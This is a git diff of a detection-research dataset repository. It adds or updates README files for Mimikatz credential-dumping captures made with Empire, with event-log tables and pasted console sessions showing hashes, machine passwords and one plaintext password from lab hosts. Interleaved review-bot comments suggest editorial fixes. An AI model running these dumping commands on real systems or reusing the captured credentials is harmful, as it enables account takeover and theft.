Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 57 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 24 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 14 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon 
| Process accessed (rule: ProcessAccess) | 436 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 147 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 140 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 102 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 26 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 22 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 5 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 3 | | Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 2 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 2426 | -| Microsoft-Windows-DNS-Client/Operational | Microsoft-Windows-DNS-Client | na | 373 | -| Microsoft-Windows-Bits-Client/Operational | Microsoft-Windows-Bits-Client | na | 4 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 1735 | -## Empire Activity +## Attacker Activity ``` -usemodule credentials/mimikatz/logonpasswords* -execute -``` - -``` -[*] Tasked 8BLV6USC to run TASK_CMD_JOB -[*] Agent 8BLV6USC tasked with task ID 2 -[*] Tasked agent 8BLV6USC to run module powershell/credentials/mimikatz/logonpasswords -(Empire: powershell/credentials/mimikatz/logonpasswords) > Job started: CD6AR8 -Hostname: IT001.shire.com / S-1-5-21-2511471446-1103646877-3980648787 +(Empire: TKV35P8X) > usemodule credentials/mimikatz/logonpasswords* +(Empire: 
powershell/credentials/mimikatz/logonpasswords) > info + + Name: Invoke-Mimikatz DumpCreds + Module: powershell/credentials/mimikatz/logonpasswords + NeedsAdmin: True + OpsecSafe: True + Language: powershell +MinLanguageVersion: 2 + Background: True + OutputExtension: None + +Authors: + @JosephBialek + @gentilkiwi + +Description: + Runs PowerSploit's Invoke-Mimikatz function to extract + plaintext credentials from memory. + +Comments: + http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Agent True TKV35P8X Agent to run module on. + +(Empire: powershell/credentials/mimikatz/logonpasswords) > execute +[*] Tasked TKV35P8X to run TASK_CMD_JOB +[*] Agent TKV35P8X tasked with task ID 17 +[*] Tasked agent TKV35P8X to run module powershell/credentials/mimikatz/logonpasswords +(Empire: powershell/credentials/mimikatz/logonpasswords) > Job started: TS8ARN +Hostname: HR001.shire.com / S-1-5-21-2511471446-1103646877-3980648787 .#####. mimikatz 2.1.1 (x64) #17763 Feb 23 2019 12:03:02 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition ** 
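Review bot: the rewritten "About this file" table in this hunk changes the collection scope, not only the record counts: the Microsoft-Windows-DNS-Client/Operational (373 records) and Microsoft-Windows-Bits-Client/Operational (4 records) rows of the previous version are gone, and the pasted Empire output shows the capture moved from IT001.shire.com to HR001.shire.com. Add a sentence under the table stating that the dataset was recaptured on HR001 with a different set of forwarded channels, so that someone comparing the old and new datasets does not read the missing DNS and BITS events as an effect of the technique.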
@@ -77,183 +103,60 @@ Hostname: IT001.shire.com / S-1-5-21-2511471446-1103646877-3980648787 mimikatz(powershell) # sekurlsa::logonpasswords -Authentication Id : 0 ; 84172714 (00000000:05045faa) -Session : Interactive from 2 -User Name : Mmidge -Domain : SHIRE -Logon Server : HFDC01 -Logon Time : 3/19/2019 11:40:04 AM -SID : S-1-5-21-2511471446-1103646877-3980648787-1119 - msv : - [00000003] Primary - * Username : Mmidge - * Domain : SHIRE - * NTLM : b415baa073a14f81f8c89a2a384f4a68 - * SHA1 : 85e07a118d7d6f0841ae1fa5061e4bbdfa24d3a7 - * DPAPI : 9375ed71838555731c26915707be9807 - tspkg : - wdigest : - * Username : Mmidge - * Domain : SHIRE - * Password : (null) - kerberos : - * Username : Mmidge - * Domain : SHIRE.COM - * Password : (null) - ssp : - credman : - -Authentication Id : 0 ; 84172686 (00000000:05045f8e) -Session : Interactive from 2 -User Name : Mmidge -Domain : SHIRE -Logon Server : HFDC01 -Logon Time : 3/19/2019 11:40:04 AM -SID : S-1-5-21-2511471446-1103646877-3980648787-1119 - msv : - [00000003] Primary - * Username : Mmidge - * Domain : SHIRE - * NTLM : b415baa073a14f81f8c89a2a384f4a68 - * SHA1 : 85e07a118d7d6f0841ae1fa5061e4bbdfa24d3a7 - * DPAPI : 9375ed71838555731c26915707be9807 - tspkg : - wdigest : - * Username : Mmidge - * Domain : SHIRE - * Password : (null) - kerberos : - * Username : Mmidge - * Domain : SHIRE.COM - * Password : (null) - ssp : - credman : - -Authentication Id : 0 ; 84135757 (00000000:0503cf4d) -Session : Interactive from 2 -User Name : DWM-2 -Domain : Window Manager -Logon Server : (null) -Logon Time : 3/19/2019 11:39:48 AM -SID : S-1-5-90-0-2 - msv : - [00000003] Primary - * Username : IT001$ - * Domain : SHIRE - * NTLM : 5c03a8bf5d1c76899fbd1ee4178574b8 - * SHA1 : 1bafcdcc855ae86e06ac39b278243a7990dcb493 - tspkg : - wdigest : - * Username : IT001$ - * Domain : SHIRE - * Password : (null) - kerberos : - * Username : IT001$ - * Domain : shire.com - * Password : 
dFK-5\;zQ5LfJu.+,?sywo9AfG;g_z0'bfgx1Ce]^lNE&mZS;B-OEKK^1[E]+4bKA$WgCj 0f.*bhGdg=0KeSK' H*VY9l!@4ooDV$]$2yM`j/jXEKCp]KMZ - ssp : - credman : - -Authentication Id : 0 ; 84135694 (00000000:0503cf0e) -Session : Interactive from 2 -User Name : DWM-2 -Domain : Window Manager -Logon Server : (null) -Logon Time : 3/19/2019 11:39:48 AM -SID : S-1-5-90-0-2 - msv : - [00000003] Primary - * Username : IT001$ - * Domain : SHIRE - * NTLM : 5c03a8bf5d1c76899fbd1ee4178574b8 - * SHA1 : 1bafcdcc855ae86e06ac39b278243a7990dcb493 - tspkg : - wdigest : - * Username : IT001$ - * Domain : SHIRE - * Password : (null) - kerberos : - * Username : IT001$ - * Domain : shire.com - * Password : dFK-5\;zQ5LfJu.+,?sywo9AfG;g_z0'bfgx1Ce]^lNE&mZS;B-OEKK^1[E]+4bKA$WgCj 0f.*bhGdg=0KeSK' H*VY9l!@4ooDV$]$2yM`j/jXEKCp]KMZ - ssp : - credman : - -Authentication Id : 0 ; 84132167 (00000000:0503c147) -Session : Interactive from 2 -User Name : UMFD-2 -Domain : Font Driver Host -Logon Server : (null) -Logon Time : 3/19/2019 11:39:47 AM -SID : S-1-5-96-0-2 - msv : - [00000003] Primary - * Username : IT001$ - * Domain : SHIRE - * NTLM : 5c03a8bf5d1c76899fbd1ee4178574b8 - * SHA1 : 1bafcdcc855ae86e06ac39b278243a7990dcb493 - tspkg : - wdigest : - * Username : IT001$ - * Domain : SHIRE - * Password : (null) - kerberos : - * Username : IT001$ - * Domain : shire.com - * Password : dFK-5\;zQ5LfJu.+,?sywo9AfG;g_z0'bfgx1Ce]^lNE&mZS;B-OEKK^1[E]+4bKA$WgCj 0f.*bhGdg=0KeSK' H*VY9l!@4ooDV$]$2yM`j/jXEKCp]KMZ - ssp : - credman : - -Authentication Id : 0 ; 1804514 (00000000:001b88e2) +Authentication Id : 0 ; 789700 (00000000:000c0cc4) Session : Interactive from 1 -User Name : pgustavo +User Name : nmartha Domain : SHIRE Logon Server : HFDC01 -Logon Time : 3/11/2019 10:14:23 PM -SID : S-1-5-21-2511471446-1103646877-3980648787-1107 +Logon Time : 5/14/2019 12:02:02 PM +SID : S-1-5-21-2511471446-1103646877-3980648787-1106 msv : [00000003] Primary - * Username : pgustavo + * Username : nmartha * Domain : SHIRE - * NTLM : 
8ece039f32592670b45fc801e2a9157d - * SHA1 : ba22a71f7aa370d915a51f3c30fc561b8ea4b95f - * DPAPI : fd5b6f36bea3f6757701cb443a46219f + * NTLM : 65f55a917b232dc6bb8e93872e458326 + * SHA1 : 19ed298d7b3d2c58918ebc0f4670cff5a1020d9e + * DPAPI : e28a4a7bea1950d9558f1e3a4662302a tspkg : wdigest : - * Username : pgustavo + * Username : nmartha * Domain : SHIRE * Password : (null) kerberos : - * Username : pgustavo + * Username : nmartha * Domain : SHIRE.COM * Password : (null) ssp : credman : -Authentication Id : 0 ; 1804488 (00000000:001b88c8) +Authentication Id : 0 ; 789663 (00000000:000c0c9f) Session : Interactive from 1 -User Name : pgustavo +User Name : nmartha Domain : SHIRE Logon Server : HFDC01 -Logon Time : 3/11/2019 10:14:23 PM -SID : S-1-5-21-2511471446-1103646877-3980648787-1107 +Logon Time : 5/14/2019 12:02:02 PM +SID : S-1-5-21-2511471446-1103646877-3980648787-1106 msv : [00000003] Primary - * Username : pgustavo + * Username : nmartha * Domain : SHIRE - * NTLM : 8ece039f32592670b45fc801e2a9157d - * SHA1 : ba22a71f7aa370d915a51f3c30fc561b8ea4b95f - * DPAPI : fd5b6f36bea3f6757701cb443a46219f + * NTLM : 65f55a917b232dc6bb8e93872e458326 + * SHA1 : 19ed298d7b3d2c58918ebc0f4670cff5a1020d9e + * DPAPI : e28a4a7bea1950d9558f1e3a4662302a tspkg : wdigest : - * Username : pgustavo + * Username : nmartha * Domain : SHIRE * Password : (null) kerberos : - * Username : pgustavo + * Username : nmartha * Domain : SHIRE.COM * Password : (null) ssp : + [00000000] + * Username : pgustavo + * Domain : shire + * Password : W1n1!19 credman : Authentication Id : 0 ; 997 (00000000:000003e5) @@ -261,7 +164,7 @@ Session : Service from 0 User Name : LOCAL SERVICE Domain : NT AUTHORITY Logon Server : (null) -Logon Time : 3/11/2019 9:00:04 PM +Logon Time : 5/3/2019 3:14:44 AM SID : S-1-5-19 msv : tspkg : 
@@ -276,144 +179,144 @@ SID : S-1-5-19 ssp : credman : -Authentication Id : 0 ; 63616 (00000000:0000f880) +Authentication Id : 0 ; 63941 (00000000:0000f9c5) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) -Logon Time : 3/11/2019 8:58:33 PM +Logon Time : 5/3/2019 3:14:43 AM SID : S-1-5-90-0-1 msv : [00000003] Primary - * Username : IT001$ + * Username : HR001$ * Domain : SHIRE - * NTLM : 5c03a8bf5d1c76899fbd1ee4178574b8 - * SHA1 : 1bafcdcc855ae86e06ac39b278243a7990dcb493 + * NTLM : 7db15a1083d24df4e5b82a0de8ba60f7 + * SHA1 : 11d7f7530035b95306ac0b9f24d29e85bed0fd13 tspkg : wdigest : - * Username : IT001$ + * Username : HR001$ * Domain : SHIRE * Password : (null) kerberos : - * Username : IT001$ + * Username : HR001$ * Domain : shire.com - * Password : dFK-5\;zQ5LfJu.+,?sywo9AfG;g_z0'bfgx1Ce]^lNE&mZS;B-OEKK^1[E]+4bKA$WgCj 0f.*bhGdg=0KeSK' H*VY9l!@4ooDV$]$2yM`j/jXEKCp]KMZ + * Password : u5@ORs;+(&[JsT@`r"_.W/y&:$>QTXx!\xN_$ppX8vj<35*wQHd[jsX4p$,aEyI3n12O EJe)Mv5?R90uf6N+PdMFV6=s`&fa>mpm[FP$+toFL?`pWRygP8j ssp : credman : -Authentication Id : 0 ; 63559 (00000000:0000f847) +Authentication Id : 0 ; 62725 (00000000:0000f505) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) -Logon Time : 3/11/2019 8:58:33 PM +Logon Time : 5/3/2019 3:14:43 AM SID : S-1-5-90-0-1 msv : [00000003] Primary - * Username : IT001$ + * Username : HR001$ * Domain : SHIRE - * NTLM : 5c03a8bf5d1c76899fbd1ee4178574b8 - * SHA1 : 1bafcdcc855ae86e06ac39b278243a7990dcb493 + * NTLM : 7db15a1083d24df4e5b82a0de8ba60f7 + * SHA1 : 11d7f7530035b95306ac0b9f24d29e85bed0fd13 tspkg : wdigest : - * Username : IT001$ + * Username : HR001$ * Domain : SHIRE * Password : (null) kerberos : - * Username : IT001$ + * Username : HR001$ * Domain : shire.com - * Password : dFK-5\;zQ5LfJu.+,?sywo9AfG;g_z0'bfgx1Ce]^lNE&mZS;B-OEKK^1[E]+4bKA$WgCj 0f.*bhGdg=0KeSK' H*VY9l!@4ooDV$]$2yM`j/jXEKCp]KMZ + * Password : 
u5@ORs;+(&[JsT@`r"_.W/y&:$>QTXx!\xN_$ppX8vj<35*wQHd[jsX4p$,aEyI3n12O EJe)Mv5?R90uf6N+PdMFV6=s`&fa>mpm[FP$+toFL?`pWRygP8j ssp : credman : Authentication Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 -User Name : IT001$ +User Name : HR001$ Domain : SHIRE Logon Server : (null) -Logon Time : 3/11/2019 8:58:17 PM +Logon Time : 5/3/2019 3:14:43 AM SID : S-1-5-20 msv : [00000003] Primary - * Username : IT001$ + * Username : HR001$ * Domain : SHIRE - * NTLM : 5c03a8bf5d1c76899fbd1ee4178574b8 - * SHA1 : 1bafcdcc855ae86e06ac39b278243a7990dcb493 + * NTLM : 7db15a1083d24df4e5b82a0de8ba60f7 + * SHA1 : 11d7f7530035b95306ac0b9f24d29e85bed0fd13 tspkg : wdigest : - * Username : IT001$ + * Username : HR001$ * Domain : SHIRE * Password : (null) kerberos : - * Username : it001$ + * Username : hr001$ * Domain : SHIRE.COM * Password : (null) ssp : credman : -Authentication Id : 0 ; 40805 (00000000:00009f65) +Authentication Id : 0 ; 39974 (00000000:00009c26) Session : Interactive from 0 User Name : UMFD-0 Domain : Font Driver Host Logon Server : (null) -Logon Time : 3/11/2019 8:58:04 PM +Logon Time : 5/3/2019 3:14:41 AM SID : S-1-5-96-0-0 msv : [00000003] Primary - * Username : IT001$ + * Username : HR001$ * Domain : SHIRE - * NTLM : 5c03a8bf5d1c76899fbd1ee4178574b8 - * SHA1 : 1bafcdcc855ae86e06ac39b278243a7990dcb493 + * NTLM : 7db15a1083d24df4e5b82a0de8ba60f7 + * SHA1 : 11d7f7530035b95306ac0b9f24d29e85bed0fd13 tspkg : wdigest : - * Username : IT001$ + * Username : HR001$ * Domain : SHIRE * Password : (null) kerberos : - * Username : IT001$ + * Username : HR001$ * Domain : shire.com - * Password : dFK-5\;zQ5LfJu.+,?sywo9AfG;g_z0'bfgx1Ce]^lNE&mZS;B-OEKK^1[E]+4bKA$WgCj 0f.*bhGdg=0KeSK' H*VY9l!@4ooDV$]$2yM`j/jXEKCp]KMZ + * Password : u5@ORs;+(&[JsT@`r"_.W/y&:$>QTXx!\xN_$ppX8vj<35*wQHd[jsX4p$,aEyI3n12O EJe)Mv5?R90uf6N+PdMFV6=s`&fa>mpm[FP$+toFL?`pWRygP8j ssp : credman : -Authentication Id : 0 ; 40613 (00000000:00009ea5) +Authentication Id : 0 ; 39911 (00000000:00009be7) Session : 
Interactive from 1 User Name : UMFD-1 Domain : Font Driver Host Logon Server : (null) -Logon Time : 3/11/2019 8:58:04 PM +Logon Time : 5/3/2019 3:14:41 AM SID : S-1-5-96-0-1 msv : [00000003] Primary - * Username : IT001$ + * Username : HR001$ * Domain : SHIRE - * NTLM : 5c03a8bf5d1c76899fbd1ee4178574b8 - * SHA1 : 1bafcdcc855ae86e06ac39b278243a7990dcb493 + * NTLM : 7db15a1083d24df4e5b82a0de8ba60f7 + * SHA1 : 11d7f7530035b95306ac0b9f24d29e85bed0fd13 tspkg : wdigest : - * Username : IT001$ + * Username : HR001$ * Domain : SHIRE * Password : (null) kerberos : - * Username : IT001$ + * Username : HR001$ * Domain : shire.com - * Password : dFK-5\;zQ5LfJu.+,?sywo9AfG;g_z0'bfgx1Ce]^lNE&mZS;B-OEKK^1[E]+4bKA$WgCj 0f.*bhGdg=0KeSK' H*VY9l!@4ooDV$]$2yM`j/jXEKCp]KMZ + * Password : u5@ORs;+(&[JsT@`r"_.W/y&:$>QTXx!\xN_$ppX8vj<35*wQHd[jsX4p$,aEyI3n12O EJe)Mv5?R90uf6N+PdMFV6=s`&fa>mpm[FP$+toFL?`pWRygP8j ssp : credman : -Authentication Id : 0 ; 39288 (00000000:00009978) +Authentication Id : 0 ; 37663 (00000000:0000931f) Session : UndefinedLogonType from 0 User Name : (null) Domain : (null) Logon Server : (null) -Logon Time : 3/11/2019 8:57:53 PM +Logon Time : 5/3/2019 3:14:40 AM SID : msv : [00000003] Primary - * Username : IT001$ + * Username : HR001$ * Domain : SHIRE - * NTLM : 5c03a8bf5d1c76899fbd1ee4178574b8 - * SHA1 : 1bafcdcc855ae86e06ac39b278243a7990dcb493 + * NTLM : 7db15a1083d24df4e5b82a0de8ba60f7 + * SHA1 : 11d7f7530035b95306ac0b9f24d29e85bed0fd13 tspkg : wdigest : kerberos : @@ -422,19 +325,19 @@ SID : Authentication Id : 0 ; 999 (00000000:000003e7) Session : UndefinedLogonType from 0 -User Name : IT001$ +User Name : HR001$ Domain : SHIRE Logon Server : (null) -Logon Time : 3/11/2019 8:57:43 PM +Logon Time : 5/3/2019 3:14:40 AM SID : S-1-5-18 msv : tspkg : wdigest : - * Username : IT001$ + * Username : HR001$ * Domain : SHIRE * Password : (null) kerberos : - * Username : it001$ + * Username : hr001$ * Domain : SHIRE.COM * Password : (null) ssp : 
diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_logonpasswords.tar.gz b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_logonpasswords.tar.gz index bbcca86c..0ea39a26 100644 Binary files a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_logonpasswords.tar.gz and b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_logonpasswords.tar.gz differ diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/README.md b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/README.md index 224810a8..46405eec 100644 --- a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/README.md +++ b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/README.md @@ -5,6 +5,8 @@ An adversary with enough privileges can access credentials from the contents of ## Technique Variations Table -| RT Platform | Network | Dataset | Updated | -| ----------- | ------- | --------- | ------- | -| empire | shire | [empire_reg_dump_sam](./empire_reg_dump_sam.md) | 2019-03-01174830 | \ No newline at end of file +| Network | Dataset | Updated | +| ----------- | ------- | --------- | +| shire | [empire_reg_dump_sam](./empire_reg_dump_sam.md) | 2019-03-01174830 | +| shire | [empire_powerdump](./empire_powerdump.md) | 2019-05-18225051 | +| shire | [empire_mimikatz_lsadump](./empire_mimikatz_lsadump.md) | 2019-05-18202513 | \ No newline at end of file 
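Review bot: the "Updated" column of the rebuilt Technique Variations table keeps run-together timestamps (`2019-03-01174830`, `2019-05-18225051`, `2019-05-18202513`) with no separator between date and time, which is hard to read and easy to mis-parse; since the table is already being rewritten to drop the "RT Platform" column, switch the values to an ISO 8601 form such as `2019-03-01T17:48:30`. The same format is used in the other Technique Variations tables touched by this change and in each dataset's "Time Taken" section, so the change should be applied consistently. The file also still ends without a trailing newline (`\ No newline at end of file`).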
diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_mimikatz_lsadump.md b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_mimikatz_lsadump.md new file mode 100644 index 00000000..7b65159e --- /dev/null +++ b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_mimikatz_lsadump.md 
@@ -0,0 +1,143 @@ +# Empire LSA SAM Dump + +PowerSploit's Invoke-Mimikatz function to extract hashes from the Security Account Managers (SAM) database + +## Technique(s) ID + +T1003 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_mimikatz_lsadump.tar.gz](./empire_mimikatz_lsadump.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18202513 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 3336 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 8 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | +| System | Service Control Manager | na | 1 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 7687 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 179 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 40 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 10 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 7 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 5 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 5 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 5 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 5 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 4 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 4 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 2 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed 
(rule: ProcessAccess) | 32757 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 99 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 79 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 67 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 31 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 6 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 3774 | + +## Attacker Activity + +``` +(Empire: TKV35P8X) > usemodule credentials/mimikatz/sam* +(Empire: powershell/credentials/mimikatz/sam) > info + + Name: Invoke-Mimikatz SAM dump + Module: powershell/credentials/mimikatz/sam + NeedsAdmin: True + OpsecSafe: True + Language: powershell +MinLanguageVersion: 2 + Background: True + OutputExtension: None + +Authors: + @JosephBialek + @gentilkiwi + +Description: + Runs PowerSploit's Invoke-Mimikatz function to extract + hashes from the Security Account Managers (SAM) database. + +Comments: + http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com htt + ps://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump#ls + a + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Agent True TKV35P8X Agent to run module on. 
+ +(Empire: powershell/credentials/mimikatz/sam) > execute +[*] Tasked TKV35P8X to run TASK_CMD_JOB +[*] Agent TKV35P8X tasked with task ID 19 +[*] Tasked agent TKV35P8X to run module powershell/credentials/mimikatz/sam +(Empire: powershell/credentials/mimikatz/sam) > Job started: 4CDAY8 +Hostname: HR001.shire.com / S-1-5-21-2511471446-1103646877-3980648787 + + .#####. mimikatz 2.1.1 (x64) #17763 Feb 23 2019 12:03:02 + .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition ** + ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) + ## \ / ## > http://blog.gentilkiwi.com/mimikatz + '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) + '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ + +mimikatz(powershell) # token::elevate +Token Id : 0 +User name : +SID name : NT AUTHORITY\SYSTEM + +508 {0;000003e7} 1 D 32920 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary + -> Impersonated ! + * Process Token : {0;000c0c9f} 1 F 29726105 SHIRE\nmartha S-1-5-21-2511471446-1103646877-3980648787-1106 (12g,23p) Primary + * Thread Token : {0;000003e7} 1 D 34211255 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation) + +mimikatz(powershell) # lsadump::sam +Domain : HR001 +SysKey : c7bc124448d3851819e68f8c2c199c2f +Local SID : S-1-5-21-3594478387-3513325568-2589039918 + +SAMKey : 8b66c564e175f6a7c0c40bc70f65144f + +RID : 000001f4 (500) +User : Administrator + +RID : 000001f5 (501) +User : Guest + +RID : 000001f7 (503) +User : DefaultAccount + +RID : 000001f8 (504) +User : WDAGUtilityAccount + Hash NTLM: 63a935cccb1d1be6c4011ec2a68f1a95 + +RID : 000003e9 (1001) +User : Nora + Hash NTLM: f9558f5eff6314996c96ec2c3800d3f0 + +mimikatz(powershell) # token::revert + * Process Token : {0;000c0c9f} 1 F 29726105 SHIRE\nmartha S-1-5-21-2511471446-1103646877-3980648787-1106 (12g,23p) Primary + * Thread Token : no token + ``` \ No newline at end of file 
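Review bot: the one-line description at the top of the new file, "PowerSploit's Invoke-Mimikatz function to extract hashes from the Security Account Managers (SAM) database", has no main verb and pluralises the name; suggest "Runs PowerSploit's Invoke-Mimikatz function to extract hashes from the Security Account Manager (SAM) database." (the `Description` block in the pasted `info` output carries the same plural, but that is Empire's own text and should stay as captured). In that pasted output the third reference URL was line-wrapped by the Empire console (`htt ps://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump#ls a`) and renders as broken text inside the code block; rejoin it as `https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump#lsa`. The closing fence is indented by one space while the opening one is not, and the file lacks a trailing newline.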
diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_mimikatz_lsadump.tar.gz b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_mimikatz_lsadump.tar.gz new file mode 100644 index 00000000..14728f8a Binary files /dev/null and b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_mimikatz_lsadump.tar.gz differ diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_powerdump.md b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_powerdump.md new file mode 100644 index 00000000..8138f129 --- /dev/null +++ b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_powerdump.md 
@@ -0,0 +1,118 @@ +# Empire Powerdump + +Dumping hashes from HKLM:\SAM\SAM\Domains\ registry keys. + +## Technique(s) ID + +T1003 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_powerdump.tar.gz](./empire_powerdump.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18225051 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 382 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 8 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 109 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 66 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 20 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 9 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 7 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 6 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 5 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 5 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 5 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 4 | +| Security | Microsoft-Windows-Security-Auditing | Kernel Object | 3 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 3 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 2 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 2 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 1 | +| Security | Microsoft-Windows-Security-Auditing | Other Object Access 
